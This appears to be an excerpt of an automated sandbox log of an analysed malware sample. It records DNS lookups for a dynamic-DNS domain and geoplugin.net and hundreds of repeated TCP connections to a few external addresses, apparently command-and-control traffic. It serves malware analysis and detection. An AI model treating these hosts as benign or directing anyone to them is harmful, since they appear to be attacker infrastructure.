Source: global traffic	DNS query: name: sembe.duckdns.org
Source: global traffic	DNS query: name: geoplugin.net
Source: global traffic	DNS query: name: geoplugin.net
Source: global traffic	DNS query: name: geoplugin.net
Source: global traffic	DNS query: name: geoplugin.net
Source: global traffic	DNS query: name: geoplugin.net

Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
